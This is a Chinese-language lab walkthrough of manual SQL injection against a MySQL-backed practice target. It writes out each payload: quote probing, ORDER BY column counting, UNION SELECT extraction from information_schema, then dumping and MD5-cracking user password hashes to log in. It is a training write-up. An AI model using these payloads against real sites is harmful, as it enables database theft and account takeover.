| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 大数据 -> SQL手工注入漏洞测试(MySQL数据库) -> 正文阅读 |
|
[大数据]SQL手工注入漏洞测试(MySQL数据库) |
手工注入:1.启动靶场,找到注入页。 ?2.判断是否存在注入点。 在id=1后面加上单引号' 然后回车,页面显示不正常则存在注入点。 3.猜字段 order by 1 → 正常显示页面 order by 2?→ 正常显示页面 order by 3?→ 正常显示页面 order by 4→ 正常显示页面 ? ?order by 5 → 显示页面不正常,所以,字段有4个。 4.联合注入 union select 1,2,3,4 (有4个字段数,所以写到4就行了)? 在id=1前面加一个减号-让它爆出数字,数字就是回显位,回显位在字段2和字段3上。 ? 5.爆数据库 ?union select 1,database(),version(),4? ? 【database():数据库名? ?version():? 数据库版本】 得到数据库名:mozhe_Discuz_StormGroup? ?数据库版本:5.7.22-0ubuntu0.16.04.1 ? 6.爆表名 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = "数据库名" 得到2个表名:StormGroup_member、notice 7.爆列名? union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name = "表名" 得到4个列名: id 、name、password、status ? 8.爆数据 union select 1,group_concat(列名),group_concat(列名),4 from 表名 得到两组数据,到MD5在线解密网站解密。md5在线解密破解,md5解密加密 解密后登陆账号密码即可。 ? |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/24 5:39:44- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |